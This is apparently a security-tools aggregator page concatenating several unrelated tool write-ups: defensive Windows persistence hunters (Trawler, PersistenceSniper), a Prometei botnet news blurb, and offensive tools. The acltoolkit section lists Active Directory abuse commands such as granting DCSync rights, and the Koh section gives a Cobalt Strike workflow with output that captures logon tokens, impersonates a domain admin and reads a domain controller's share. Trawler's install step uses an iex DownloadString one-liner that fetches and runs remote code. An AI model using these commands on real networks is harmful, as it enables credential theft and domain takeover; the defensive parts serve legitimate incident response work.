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Trawler - PowerShell Script To Help Incident Responders Discover Adversary Persistence Mechanisms

By: Zion3R

Dredging Windows for Persistence

What is it?

Trawler is a PowerShell script designed to help Incident Responders discover potential indicators of compromise on Windows hosts, primarily focused on persistence mechanisms including Scheduled Tasks, Services, Registry Modifications, Startup Items, Binary Modifications and more.

Currently, trawler can detect most of the persistence techniques specifically called out by MITRE and Atomic Red Team with more detections being added on a regular basis.

Main Features

  • Scanning Windows OS for a variety of persistence techniques (Listed below)
  • CSV Output with MITRE Technique and Investigation Jumpstart Metadata
  • Analysis and Remediation Guidance Documentation (
  • Dynamic Risk Assignment for each detection
  • Built-in Allow Lists for common Windows configurations spanning Windows 10/Server 2012|2016|2019|2022 to reduce noise
  • Capture persistence metadata from 'golden' enterprise image for use as a dynamic allow-list at runtime
  • Analyze mounted disk images via drive re-targeting

How do I use it?

Just download and run trawler.ps1 from an Administrative PowerShell/cmd prompt - any detections will be displayed in the console as well as written to a CSV ('detections.csv') in the current working directory. The generated CSV will contain Detection Name, Source, Risk, Metadata and the relevant MITRE Technique.

Or use this one-liner from an Administrative PowerShell terminal:

iex ((New-Object System.Net.WebClient).DownloadString(''))

Certain detections have allow-lists built-in to help remove noise from default Windows configurations (10/2016/2019/2022) - expected Scheduled Tasks, Services, etc. Of course, it is always possible for attackers to hijack these directly and masquerade with great detail as a default OS process - take care to use multiple forms of analysis and detection when dealing with skillful adversaries.

If you have examples or ideas for additional detections, please feel free to submit an Issue or PR with relevant technical details/references - the code-base is a little messy right now and will be cleaned up over time.

Additionally, if you identify obvious false positives, please let me know by opening an issue or PR on GitHub! The obvious culprits for this will be non-standard COMs, Services or Tasks.

CLI Parameters

-scanoptions : Tab-through possible detections and select a sub-set using comma-delimited terms (eg. .\trawler.ps1 -scanoptions Services,Processes)
-hide : Suppress Detection output to console
-snapshot : Capture a "persistence snapshot" of the current system, defaulting to "$PSScriptRoot\snapshot.csv"
-snapshotpath : Define a custom file-path for saving snapshot output to.
-outpath : Define a custom file-path for saving detection output to (defaults to "$PSScriptRoot\detections.csv")
-loadsnapshot : Define the path for an existing snapshot file to load as an allow-list reference
-drivetarget : Define the variable for a mounted target drive (eg. .\trawler.ps1 -targetdrive "D:") - using this alone leads to an 'assumed homedrive' variable of C: for analysis purposes

What separates this from PersistenceSniper?

PersistenceSniper is an awesome tool - I've used it heavily in the past - but there are a few key points that differentiate these utilities

  • trawler is (currently) a local utility - it would be pretty straight-forward to wrap it in a loop and use WinRM/PowerShell Sessions to execute it on remote hosts though
  • trawler implements allow-listing for many 'noisy' detections to help remove expected detections from default configurations of Windows (10/2016/2019/2022) and these are constantly being updated
    • PersistenceSniper (for the most part) does not contain any type of allow-listing - therefore, there is more noise generated when considering items such as Services, Scheduled Tasks, general COM DLL scanning, etc.
  • trawler's output is much more simplified - Name, Risk, Source, MITRE Technique and Metadata are the only items provided for each detection to help analysts jump-start their persistence hunting efforts
  • Regex is used in many checks to help detect 'suspicious' keywords or patterns in various critical areas including scanned file contents, registry values, etc.
  • trawler supports 'snapshotting' a system (for example, an enterprise golden image) then using the generated snapshot as an allow-list to reduce noise.
  • trawler supports 'drive-retargeting' to check dead-boxes mounted to an analysis machine.

Overall, these tools are extremely similar but approach the problem from slightly different angles - PersistenceSniper provides all information back to the analyst for review while Trawler tries to limit what is returned to only results that are likely to be potential adversary persistence mechanisms. As such, there is a possibility for false-negatives with trawler if an adversary completely mimics an allow-listed item.

Tuning to your environment

Trawler supports loading an allow-list from a 'snapshot' - to do this requires two steps.

  1. Run '.\trawler.ps1 -snapshot' on a "Golden Image" representing the servers in your environment - once complete, in addition to the standard 'detections.csv' a file named 'snapshots.csv' will be generated
  2. This file can then be used as input to trawler when running on other hosts and the data will be loaded dynamically as an allow-list for each appropriate detection
    1. '.\trawler.ps1' -loadsnapshot "path\to\snapshot.csv"

That's it - all relevant detections will then draw from the snapshot file as an allow-list to reduce noise and identify any potential changes to the base image that may have occurred.

(Allow-listing is implemented for most of the checks but not all - still being actively implemented)

Drive ReTargeting

Often during an investigation, analysts may end up mounting a new drive that represents an imaged Windows device - Trawler now partially supports scanning these mounted drives through the use of the '-drivetarget' parameter.

At runtime, Trawler will re-target temporary script-level variables for use in checking file-based artifacts and also will attempt to load relevant Registry Hives (HKLM\SOFTWARE, HKLM\SYSTEM, NTUSER.DATs, USRCLASS.DATs) underneath HKLM/HKU and prefixed by 'ANALYSIS_'. Trawler will also attempt to unload these temporarily loaded hives upon script completion.

As an example, if you have an image mounted at a location such as 'F:\Test' which contains the NTFS file system ('F:\Test\Windows', 'F:\Test\User', etc) then you can invoke trawler like below;

.\trawler.ps1 -drivetarget "F:\Test"

Please note that since trawler attempts to load the registry hive files from the drive in question, mapping a UNC path to a live remote device will NOT work as those files will not be accessible due to system locks. I am working on an approach which will handle live remote devices, stay tuned.

What is not inspected when drive retargeting?

  • Running Processes
  • Network Connections
  • 'Phantom' DLLs
  • WMI Consumers (Being worked on)
  • BITS Jobs (Being worked on)
  • Certificate Parsing (Being worked on)

Most other checks will function fine because they are based entirely on reading registry hives or file-based artifacts (or can be converted to do so, such as directly reading Task XML as opposed to using built-in command-lets.)

Any limitations in checks when doing drive-retargeting will be discussed more fully in the GitHub Wiki.

Example ImagesΒ 


What is inspected?

  • Scheduled Tasks
  • Users
  • Services
  • Running Processes
  • Network Connections
  • WMI Event Consumers (CommandLine/Script)
  • Startup Item Discovery
  • BITS Jobs Discovery
  • Windows Accessibility Feature Modifications
  • PowerShell Profile Existence
  • Office Addins from Trusted Locations
  • SilentProcessExit Monitoring
  • Winlogon Helper DLL Hijacking
  • Image File Execution Option Hijacking
  • RDP Shadowing
  • UAC Setting for Remote Sessions
  • Print Monitor DLLs
  • LSA Security and Authentication Package Hijacking
  • Time Provider DLLs
  • Print Processor DLLs
  • Boot/Logon Active Setup
  • User Initialization Logon Script Hijacking
  • ScreenSaver Executable Hijacking
  • Netsh DLLs
  • AppCert DLLs
  • AppInit DLLs
  • Application Shimming
  • COM Object Hijacking
  • LSA Notification Hijacking
  • 'Office test' Usage
  • Office GlobalDotName Usage
  • Terminal Services DLL Hijacking
  • Autodial DLL Hijacking
  • Command AutoRun Processor Abuse
  • Outlook OTM Hijacking
  • Trust Provider Hijacking
  • LNK Target Scanning (Suspicious Terms, Multiple Extensions, Multiple EXEs)
  • 'Phantom' Windows DLL Names loaded into running process (eg. un-signed WptsExtensions.dll)
  • Scanning Critical OS Directories for Unsigned EXEs/DLLs
  • Un-Quoted Service Path Hijacking
  • PATH Binary Hijacking
  • Common File Association Hijacks and Suspicious Keywords
  • Suspicious Certificate Hunting
  • GPO Script Discovery/Scanning
  • NLP Development Platform DLL Overrides
  • AeDebug/.NET/Script/Process/WER Debug Replacements
  • Explorer 'Load'
  • Windows Terminal startOnUserLogin Hijacks
  • App Path Mismatches
  • Service DLL/ImagePath Mismatches
  • GPO Extension DLLs
  • Potential COM Hijacks
  • Non-Standard LSA Extensions
  • DNSServerLevelPluginDll Presence
  • Explorer\MyComputer Utility Hijack
  • Terminal Services InitialProgram Check
  • RDP Startup Programs
  • Microsoft Telemetry Commands
  • Non-Standard AMSI Providers
  • Internet Settings LUI Error DLL
  • PeerDist\Extension DLL
  • ErrorHandler.CMD Checks
  • Built-In Diagnostics DLL
  • MiniDumpAuxiliary DLLs
  • KnownManagedDebugger DLLs
  • WOW64 Compatibility Layer DLLs
  • EventViewer MSC Hijack
  • Uninstall Strings Scan
  • PolicyManager DLLs
  • SEMgr Wallet DLL
  • WER Runtime Exception Handlers
  • HTML Help (.CHM)
  • Remote Access Tool Artifacts (Files, Directories, Registry Keys)
  • ContextMenuHandler DLL Checks
  • Office AI.exe Presence
  • Notepad++ Plugins
  • MSDTC Registry Hijacks
  • Narrator DLL Hijack (MSTTSLocEnUS.DLL)
  • Suspicious File Location Checks


MITRE Techniques Evaluated

Please be aware that some of these are (of course) more detected than others - for example, we are not detecting all possible registry modifications but rather inspecting certain keys for obvious changes and using the generic MITRE technique "Modify Registry" where no other technique is applicable. For other items such as COM hijacking, we are inspecting all entries in the relevant registry section, checking against 'known-good' patterns and bubbling up unknown or mismatched values, resulting in a much more complete detection surface for that particular technique.

  • T1037: Boot or Logon Initialization Scripts
  • T1037.001: Boot or Logon Initialization Scripts: Logon Script (Windows)
  • T1037.005: Boot or Logon Initialization Scripts: Startup Items
  • T1055.001: Process Injection: Dynamic-link Library Injection
  • T1059: Command and Scripting Interpreter
  • T1071: Application Layer Protocol
  • T1098: Account Manipulation
  • T1112: Modify Registry
  • T1053: Scheduled Task/Job
  • T1136: Create Account
  • T1137.001: Office Application Office Template Macros
  • T1137.002: Office Application Startup: Office Test
  • T1137.006: Office Application Startup: Add-ins
  • T1197: BITS Jobs
  • T1505.005: Server Software Component: Terminal Services DLL
  • T1543.003: Create or Modify System Process: Windows Service
  • T1546: Event Triggered Execution
  • T1546.001: Event Triggered Execution: Change Default File Association
  • T1546.002: Event Triggered Execution: Screensaver
  • T1546.003: Event Triggered Execution: Windows Management Instrumentation Event Subscription
  • T1546.007: Event Triggered Execution: Netsh Helper DLL
  • T1546.008: Event Triggered Execution: Accessibility Features
  • T1546.009: Event Triggered Execution: AppCert DLLs
  • T1546.010: Event Triggered Execution: AppInit DLLs
  • T1546.011: Event Triggered Execution: Application Shimming
  • T1546.012: Event Triggered Execution: Image File Execution Options Injection
  • T1546.013: Event Triggered Execution: PowerShell Profile
  • T1546.015: Event Triggered Execution: Component Object Model Hijacking
  • T1547.002: Boot or Logon Autostart Execution: Authentication Packages
  • T1547.003: Boot or Logon Autostart Execution: Time Providers
  • T1547.004: Boot or Logon Autostart Execution: Winlogon Helper DLL
  • T1547.005: Boot or Logon Autostart Execution: Security Support Provider
  • T1547.009: Boot or Logon Autostart Execution: Shortcut Modification
  • T1547.012: Boot or Logon Autostart Execution: Print Processors
  • T1547.014: Boot or Logon Autostart Execution: Active Setup
  • T1553: Subvert Trust Controls
  • T1553.004: Subvert Trust Controls: Install Root Certificate
  • T1556.002: Modify Authentication Process: Password Filter DLL
  • T1574: Hijack Execution Flow
  • T1574.007: Hijack Execution Flow: Path Interception by PATH Environment Variable
  • T1574.009: Hijack Execution Flow: Path Interception by Unquoted Path


This tool would not exist without the amazing InfoSec community - the most notable references I used are provided below.

More References

Acltoolkit - ACL Abuse Swiss-Knife

By: Zion3R

acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses.


pip install acltoolkit-ad


git clone
cd acltoolkit


usage: acltoolkit [-h] [-debug] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-dc-ip ip address] [-scheme ldap scheme]
target {get-objectacl,set-objectowner,give-genericall,give-dcsync,add-groupmember,set-logonscript} ...

ACL abuse swiss-army knife

positional arguments:
target [[domain/]username[:password]@]<target name or address>
get-objectacl Get Object ACL
set-objectowner Modify Object Owner
give-genericall Grant an object GENERIC ALL on a targeted object
give-dcsync Grant an object DCSync capabilities on the domain
add-groupmember Add Member to Group
set-logonscript Change Logon Sript of User

options :
-h, --help show this help message and exit
-debug Turn DEBUG output ON
-no-pass don't ask for password (useful for -k)
-k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the
command line
-dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
-scheme ldap scheme

NTLM hashes, format is LMHASH:NTHAS H



$ acltoolkit get-objectacl -h
usage: acltoolkit target get-objectacl [-h] [-object object] [-all]

-h, --help show this help message and exit
-object object Dump ACL for <object>. Parameter can be a sAMAccountName, a name, a DN or an objectSid
-all List every ACE of the object, even the less-interesting ones

The get-objectacl will take a sAMAccountName, a name, a DN or an objectSid as input with -object and will list Sid, Name, DN, Class, adminCount, LogonScript configured, Primary Group, Owner and DACL of it. If no parameter supplied, will list informations about the account used to authenticate.

$ acltoolkit waza.local/jsmith:Password#123@ get-objectacl
Sid : S-1-5-21-267175082-2660600898-836655089-1103
Name : waza\John Smith
DN : CN=John Smith,CN=Users,DC=waza,DC=local
Class : top, person, organizationalPerson, user
adminCount : False

Logon Script
scriptPath : \\WAZZAAAAAA\OCD\test.bat
msTSInitialProgram: \\WAZZAAAAAA\OCD\test.bat

Sid : S-1-5-21-267175082-2660600898-836655089-513
Name : waza\Domain Users
DN : CN=Domain Users,OU=Builtin Groups,DC=waza,DC=local


Sid : S-1-5-21-267175082-2660600898-836655089-512
Name : waza\Domain Admins

ObjectSid : S-1-1-0
Name : Everyone
Ac cessMask : 256
IsInherited : False
ObjectAceType : User-Change-Password


ObjectSid : S-1-5-32-544
Name : BUILTIN\Administrator
AccessMask : 983485
IsInherited : True


$ acltoolkit set-objectowner -h
usage: acltoolkit target set-objectowner [-h] -target-sid target_sid [-owner-sid owner_sid]

-h, --help show this help message and exit
-target-sid target_sid
Object Sid targeted
-owner-sid owner_sid New Owner Sid

The set-objectowner will take as input a target sid and an owner sid, and will change the owner of the target object.


$ acltoolkit give-genericall -h
usage: acltoolkit target give-genericall [-h] -target-sid target_sid [-granted-sid owner_sid]

-h, --help show this help message and exit
-target-sid target_sid
Object Sid targeted
-granted-sid owner_sid
Object Sid granted GENERIC_ALL

The give-genericall will take as input a target sid and a granted sid, and will change give GENERIC_ALL DACL to the granted SID to the target object.


$ acltoolkit give-dcsync -h
usage: acltoolkit target give-dcsync [-h] [-granted-sid owner_sid]

-h, --help show this help message and exit
-granted-sid owner_sid
Object Sid granted DCSync capabilities

The give-dcsync will take as input a granted sid, and will change give DCSync capabilities to the granted SID.


$ acltoolkit add-groupmember -h
usage: acltoolkit target add-groupmember [-h] [-user user] -group group

-h, --help show this help message and exit
-user user User added to a group
-group group Group where the user will be added

The add-groupmember will take as input a user sAMAccountName and a group sAMAccountName, and will add the user to the group


$ acltoolkit set-logonscript -h
usage: acltoolkit target set-logonscript [-h] -target-sid target_sid -script-path script_path [-logonscript-type logonscript_type]

-h, --help show this help message and exit
-target-sid target_sid
Object Sid of targeted user
-script-path script_path
Script path to set for the targeted user
-logonscript-type logonscript_type
Logon Script variable to change (default is scriptPath)

The set-logonscript will take as input a target sid and a script path, and will the the Logon Script path of the targeted user to the script path specified.

New Version of Prometei Botnet Infects Over 10,000 Systems Worldwide

An updated version of a botnet malware calledΒ PrometeiΒ has infected more than 10,000 systems worldwide since November 2022. The infections are both geographically indiscriminate and opportunistic, with a majority of the victims reported in Brazil, Indonesia, and Turkey. Prometei, first observed in 2016, is a modular botnet that features a large repertoire of components and several proliferation

PersistenceSniper - Powershell Script That Can Be Used By Blue Teams, Incident Responders And System Administrators To Hunt Persistences Implanted In Windows Machines

PersistenceSniper is a Powershell script that can be used by Blue Teams, Incident Responders and System Administrators to hunt persistences implanted in Windows machines. The script is also available on Powershell Gallery.

The Why

Why writing such a tool, you might ask. Well, for starters, I tried looking around and I did not find a tool which suited my particular use case, which was looking for known persistence techniques, automatically, across multiple machines, while also being able to quickly and easily parse and compare results. Sure, Sysinternals' Autoruns is an amazing tool and it's definitely worth using, but, given it outputs results in non-standard formats and can't be run remotely unless you do some shenanigans with its command line equivalent, I did not find it a good fit for me. Plus, some of the techniques I implemented so far in PersistenceSniper have not been implemented into Autoruns yet, as far as I know. Anyway, if what you need is an easy to use, GUI based tool with lots of already implemented features, Autoruns is the way to go, otherwise let PersistenceSniper have a shot, it won't miss it :)


Using PersistenceSniper is as simple as:

PS C:\> git clone
PS C:\> Import-Module .\PersistenceSniper\PersistenceSniper\PersistenceSniper.psd1
PS C:\> Find-AllPersistence

If you need a detailed explanation of how to use the tool or which parameters are available and how they work, PersistenceSniper's Find-AllPersistence supports Powershell's help features, so you can get detailed, updated help by using the following command after importing the module:

Get-Help -Name Find-AllPersistence -Full

PersistenceSniper's Find-AllPersistence returns an array of objects of type PSCustomObject with the following properties:

This allows for easy output formatting and filtering. Let's say you only want to see the persistences that will allow the attacker to regain access as NT AUTHORITY\SYSTEM (aka System):
PS C:\> Find-AllPersistence | Where-Object "Access Gained" -EQ "System"

Of course, being PersistenceSniper a Powershell-based tool, some cool tricks can be performed, like passing its output to Out-GridView in order to have a GUI-based table to interact with.

Interpreting results

As already introduced, Find-AllPersistence outputs an array of Powershell Custom Objects. Each object has the following properties, which can be used to filter, sort and better understand the different techniques the function looks for:

  • ComputerName: this is fairly straightforward. If you run Find-AllPersistence without a -ComputerName parameter, PersistenceSniper will run only on the local machine. Otherwise it will run on the remote computer(s) you specify;
  • Technique: this is the name of the technique itself, as it's commonly known in the community;
  • Classification: this property can be used to quickly identify techniques based on their MITRE ATT&CK technique and subtechnique number. For those techniques which don't have a MITRE ATT&CK classification, other classifications are used, the most common being Hexacorn's one since a lot of techniques were discovered by him. When a technique's source cannot be reliably identified, the "Uncatalogued Technique N.#" classification is used;
  • Path: this is the path, on the filesystem or in the registry, at which the technique has been implanted;
  • Value: this is the value of the registry property the techniques uses, or the name of the executable/library used, in case it's a technique which relies on planting something on the filesystem;
  • Access Gained: this is the kind of access the technique grants the attacker. If it's a Run key under HKCU for example, the access gained will be at a user level, while if it's under HKLM it will be at system level;
  • Note: this is a quick explanation of the technique, so that its workings can be easily grasped;
  • Reference: this is a link to a more in-depth explanation of the technique, should the analyst need to study it more.

Dealing with false positives

Let's face it, hunting for persistence techniques also comes with having to deal with a lot of false positives. This happens because, while some techniques are almost never legimately used, many indeed are by legit software which needs to autorun on system boot or user login.

This poses a challenge, which in many environments can be tackled by creating a CSV file containing known false positives. If your organization deploys systems using something like a golden image, you can run PersistenceSniper on a system you just created, get a CSV of the results and use it to filter out results on other machines. This approach comes with the following benefits:

  • Not having to manage a whitelist of persistences which can be tedious and error-prone;
  • Tailoring the false positives to the organizations, and their organizational units, which use the tool;
  • Making it harder for attackers who want to blend in false positives by not publicly disclosing them in the tool's code.

Find-AllPersistence comes with parameters allowing direct output of the findings to a CSV file, while also being able to take a CSV file as input and diffing the results.

PS C:\> Find-AllPersistence -DiffCSV false_positives.csv


Looking for persistences by taking incremental snapshots

One cool way to use PersistenceSniper my mate Riccardo suggested is to use it in an incremental way: you could setup a Scheduled Task which runs every X hours, takes in the output of the previous iteration through the -DiffCSV parameter and outputs the results to a new CSV. By keeping track of the incremental changes, you should be able to spot within a reasonably small time frame new persistences implanted on the machine you are monitoring.

Persistence techniques implemented so far

The topic of persistence, especially on Windows machines, is one of those which see new discoveries basically every other week. Given the sheer amount of persistence techniques found so far by researchers, I am still in the process of implementing them. So far the following 31 techniques have been implemented successfully:


The techniques implemented in this script have already been published by skilled researchers around the globe, so it's right to give credit where credit's due. This project wouldn't be around if it weren't for:

I'd also like to give credits to my fellow mates at @APTortellini, in particular Riccardo Ancarani, for the flood of ideas that helped it grow from a puny text-oriented script to a full-fledged Powershell tool.


This project is under the CC0 1.0 Universal license. TL;DR: you can copy, modify, distribute and perform the work, even for commercial purposes, all without asking permission.

Koh - The Token Stealer

Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.

Some code was inspired by Elad Shamir's Internal-Monologue project (no license), as well as KB180548. For why this is possible and Koh's approeach, see the Technical Background section of this README.

For a deeper explanation of the motivation behind Koh and its approach, see the Koh: The Token Stealer post.

@harmj0y is the primary author of this code base. @tifkin_ helped with the approach, BOF implementation, and some token mechanics.

Koh is licensed under the BSD 3-Clause license.

Koh Server

The Koh "server" captures tokens and uses named pipes for control/communication. This can be wrapped in Donut and injected into any high-integrity SYSTEM process (see The Inline Shenanigans Bug).


We are not planning on releasing binaries for Koh, so you will have to compile yourself :)

Koh has been built against .NET 4.7.2 and is compatible with Visual Studio 2019 Community Edition. Simply open up the project .sln, choose "Release", and build. The Koh.exe assembly and Koh.bin Donut-built PIC will be output to the main directory. The Donut blob is both x86/x64 compatible, and is built with the following options using v0.9.3 of Donut at ./Misc/Donut.exe:

  [ Instance type : Embedded
[ Entropy : Random names + Encryption
[ Compressed : Xpress Huffman
[ File type : .NET EXE
[ Parameters : capture
[ Target CPU : x86+amd64
[ AMSI/WDLP : abort

Donut's license is BSD 3-clause.


Koh.exe Koh.exe <list | monitor | capture> [GroupSID... GroupSID2 ...]

  • list - lists (non-network) logon sessions
  • monitor - monitors for new/unique (non-network) logon sessions
  • capture - captures one unique token per SID found for new (non-network) logon sessions

Group SIDs can be supplied command line as well, causing Koh to monitor/capture only logon sessions that contain the specified group SIDs in their negotiated token information.

Example - Listing Logon Sessions

C:\Temp>Koh.exe list

__ ___ ______ __ __
| |/ / / __ \ | | | |
| ' / | | | | | |__| |
| < | | | | | __ |
| . \ | `--' | | | | |
|__|\__\ \______/ |__| |__|

[*] Command: list

[*] Elevated to SYSTEM

[*] New Logon Session - 6/22/2022 2:51:46 PM
UserName : THESHIRE\testuser
LUID : 207990196
LogonType : Interactive
AuthPackage : Kerberos
User SID : S-1-5-21-937929760-3187473010-80948926-1119
Origin LUID : 1677733 (0x1999a5)

[*] New Logon Session - 6/22/2022 2:51:46 PM
LUID : 81492692
LogonType : Interactive
AuthPackage : Negotiate
User SID : S-1-5-21-937929760-3187473010-80948926-1145
Origin LUID : 1677765 (0x1999c5)

[*] New Logon Session - 6/22/2022 2:51:46 PM
LUID : 81492608
LogonType : Interactive
AuthPackage : Kerberos
User SID : S-1-5-21-937929760-3187473010-80948926-1145
Origin LUID : 1677765 (0x1999c5)

[*] New Logon Session - 6/22/2022 2:51:46 PM
UserName : THESHIRE\harmj0y
LUID : 1677733
LogonType : Interactive
AuthPackage : Kerberos
User SID : S-1-5-21-937929760-3187473010-80948926-1104
Origin LUID : 999 (0x3e7)

Example - Monitoring for Logon Sessions (with group SID filtering)

Only lists results that have the domain admins (-512) group SID in their token information:

C:\Temp>Koh.exe monitor S-1-5-21-937929760-3187473010-80948926-512

__ ___ ______ __ __
| |/ / / __ \ | | | |
| ' / | | | | | |__| |
| < | | | | | __ |
| . \ | `--' | | | | |
|__|\__\ \______/ |__| |__|

[*] Command: monitor

[*] Starting server with named pipe: imposecost

[*] Elevated to SYSTEM

[*] Targeting group SIDs:

[*] New Logon Session - 6/22/2022 2:52:17 PM
LUID : 81492692
LogonType : Interactive
AuthPackage : Negotiate
User SID : S-1-5-21-937929760-3187473010-80948926-1145
Origin LUID : 1677765 (0x1999c5)

[*] New Logon Session - 6/22/2022 2:52:17 PM
LUID : 81492608
Lo gonType : Interactive
AuthPackage : Kerberos
User SID : S-1-5-21-937929760-3187473010-80948926-1145
Origin LUID : 1677765 (0x1999c5)

[*] New Logon Session - 6/22/2022 2:52:17 PM
UserName : THESHIRE\harmj0y
LUID : 1677733
LogonType : Interactive
AuthPackage : Kerberos
User SID : S-1-5-21-937929760-3187473010-80948926-1104
Origin LUID : 999 (0x3e7)

Koh Client

The current usable client is a Beacon Object File at .\Clients\BOF\. Load the .\Clients\BOF\KohClient.cna aggressor script in your Cobalt Strike client to enable BOF control of the Koh server. The only requirement for using captured tokens is SeImpersonatePrivilege. The communication named pipe has an "Everyone" DACL but uses a basic shared password (super securez).

To compile fresh on Linux using Mingw, see the .\Clients\BOF\ script. The only requirement (on Debian at least) should be apt-get install gcc-mingw-w64


beacon> help koh
koh list - lists captured tokens
koh groups LUID - lists the group SIDs for a captured token
koh filter list - lists the group SIDs used for capture filtering
koh filter add SID - adds a group SID for capture filtering
koh filter remove SID - removes a group SID from capture filtering
koh filter reset - resets the SID group capture filter
koh impersonate LUID - impersonates the captured token with the give LUID
koh release all - releases all captured tokens
koh release LUID - releases the captured token for the specified LUID
koh exit - signals the Koh server to exit

Group SID Filtering

The koh filter add S-1-5-21-<DOMAIN>-<RID> command will only capture tokens that contain the supplied group SID. This command can be run multiple times to add additional SIDs for capture. This can help prevent possible stability issues due to a large number of token leaks.

Example - Capture

"Captures" logon sessions by negotiating usable tokens for each new session.


C:\Temp>Koh.exe capture

__ ___ ______ __ __
| |/ / / __ \ | | | |
| ' / | | | | | |__| |
| < | | | | | __ |
| . \ | `--' | | | | |
|__|\__\ \______/ |__| |__|

[*] Command: capture

[*] Starting server with named pipe: imposecost

[*] Elevated to SYSTEM

[*] New Logon Session - 6/22/2022 2:53:01 PM
UserName : THESHIRE\testuser
LUID : 207990196
LogonType : Interactive
AuthPackage : Kerberos
User SID : S-1-5-21-937929760-3187473010-80948926-1119
Credential UserName : testuser@THESHIRE.LOCAL
Origin LUID : 1677733 (0x1999a5)

[*] Successfully negotiated a token for LUID 207990196 (hToken: 848)

[*] New Logon Session - 6/22/2022 2:53:01 PM
LUID : 81492692
LogonType : Interactive
AuthPackage : Negotiate
User SID : S-1-5-21-937929760-3187473010-80948926-1145
Credential UserName : da@THESHIRE.LOCAL
Origin LUID : 1677765 (0x1999c5)

[*] Successfully negotiated a token for LUID 81492692 (hToken: 976)

[*] New Logon Session - 6/22/2022 2:53:01 PM
UserName : THESHIRE\harmj0y
LUID : 1677733
LogonType : Interactive
AuthPackage : Kerberos
User SID : S-1-5-21-937929760-3187473010-80948926-1104
Credential UserName : harmj0y@THESHIRE.LOCAL
Origin LUID : 999 (0x3e7)

[*] Successfully negotiated a token for LUID 1677733 (hToken: 980)

BOF client:

beacon> shell dir \\dc.theshire.local\C$
[*] Tasked beacon to run: dir \\dc.theshire.local\C$
[+] host called home, sent: 69 bytes
[+] received output:
Access is denied.

beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 20 bytes
[*] You are NT AUTHORITY\SYSTEM (admin)

beacon> koh list
[+] host called home, sent: 6548 bytes
[+] received output:
[*] Using KohPipe : \\.\pipe\imposecost

[+] received output:

Username : THESHIRE\localadmin (S-1-5-21-937929760-3187473010-80948926-1000)
LUID : 67556826
CaptureTime : 6/21/2022 1:24:42 PM
LogonType : Interactive
AuthPackage : Negotiate
CredUserName : localadmin@THESHIRE.LOCAL
Origin LUID : 1676720

Username : THESHIRE\da (S-1-5-21-937929760-3187473010-80948926-1145)
LUID : 67568439
CaptureTime : 6/21/2022 1:24:50 PM
LogonType : Interactive
AuthPackage : Negotiate
CredUserName : da@THESHIRE.LOCAL
Origin LUID : 1677765

Username : THESHIRE\harmj0y (S-1-5-21-937929760-3187473010-80948926-1104)
LUID : 1677733
CaptureTime : 6/21/2022 1:23:10 PM
LogonType : Interactive
AuthPackage : Kerberos
CredUserName : harmj0y@THESHIRE.LOCAL
Origin LUID : 999

beacon> koh groups 67568439
[+] host called home, sent: 6548 bytes
[+] received output:
[*] Using KohPipe : \\.\pipe\imposecost

[+] received output:

beacon> koh impersonate 67568439
[+] host called home, sent: 6548 bytes
[+] received output:
[*] Using KohPipe : \\.\pipe\imposecost

[+] received output:
[*] Enabled SeImpersonatePrivilege

[+] received output:
[*] Creating impersonation named pipe: \\.\pipe\imposingcost

[+] received output:
[*] Impersonation succeeded. Duplicating token.

[+] received output:
[*] Impersonated token successfully duplicated.

[+] Impersonated THESHIRE\da

beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 20 bytes
[*] You are THESHIRE\DA (admin)

beacon> shell dir \\dc.theshire.local\C$
[*] Tasked beacon to run: dir \\dc.theshire.local\C$
[+] host called home, sent: 69 bytes
[+] received output:
Volume in drive \\dc.theshire.local\C$ has no label.
Volume Serial Number is A4FF-7240

Directory of \\dc.theshire.local\C$

01/04/2021 11:43 AM <DIR> inetpub
05/30/2019 03:08 PM <DIR> Pe rfLogs
05/18/2022 01:27 PM <DIR> Program Files
04/15/2021 09:44 AM <DIR> Program Files (x86)
03/20/2020 12:28 PM <DIR> RBFG
10/20/2021 01:14 PM <DIR> Temp
05/23/2022 06:30 PM <DIR> tools
03/11/2022 04:10 PM <DIR> Users
06/21/2022 01:30 PM <DIR> Windows
0 File(s) 0 bytes
9 Dir(s) 40,504,201,216 bytes free

Technical Background

When a new logon session is estabslished on a system, a new token for the logon session is created by LSASS using the NtCreateToken() API call and returned by the caller of LsaLogonUser(). This increases the ReferenceCount field of the logon session kernel structure. When this ReferenceCount reaches 0, the logon session is destroyed. Because of the information described in the Why This Is Possible section, Windows systems will NOT release a logon session if a token handle still exists to it (and therefore the reference count != 0).

So if we can get a handle to a newly created logon session via a token, we can keep that logon session open and later impersonate that token to utilize any cached credentials it contains.

Why This Is Possible

According to this post by a Microsoft engineer:

After MS16-111, when security tokens are leaked, the logon sessions associated with those security tokens also remain on the system until all associated tokens are closed... even after the user has logged off the system. If the tokens associated with a given logon session are never released, then the system now also has a permanent logon session leak as well.

MS16-111 was applied back to Windows 7/Server 2008, so this approach should be effective for everything except Server 2003 systems.


Enumerating logon sessions is easy (from an elevated context) through the use of the LsaEnumerateLogonSessions() Win32 API. What is more difficult is taking a specific logon session identifier (LUID) and somehow getting a usable token linked to that session.

Possible Approaches

We brainstormed a few ways to a) hold open logon sessions and b) abuse this for token impersonation/use of cached credentials.

  1. The first approach was to use NtCreateToken() which allows you to specify a logon session ID (LUID) to create a new token.
    • Unfortunately, you need SeCreateTokenPrivilege which is traditionally only held by LSASS, meaning you need to steal LSASS' token which isn't ideal.
    • One possibility was to add SeCreateTokenPrivilege to NT AUTHORITY\SYSTEM via LSA policy modification, but this would need a reboot/new logon session to express the new user rights.
  2. You can also focus on just RemoteInteractive logon sessions by using WTSQueryUserToken() to get tokens for new desktop sessions to clone.
    • This is the approach apparently demonstrated by Ryan.
    • Unfortunately this misses newly created local sessions and incoming sessions created from things like PSEXEC.
  3. On a new logon session, open up a handle to every reachable process and enumerate all existing handles, cloning the token linked to the new logon session.
    • This requires opening up lots of processes/handles, which looks very suspicious.
  4. The AcquireCredentialsHandle()/InitializeSecurityContext()/AcceptSecurityContext() approach described below, which is what we went with.

Our Approach

The SSPI AcquireCredentialsHandle() call has a pvLogonID field which states:

A pointer to a locally unique identifier (LUID) that identifies the user. This parameter is provided for file-system processes such as network redirectors. 

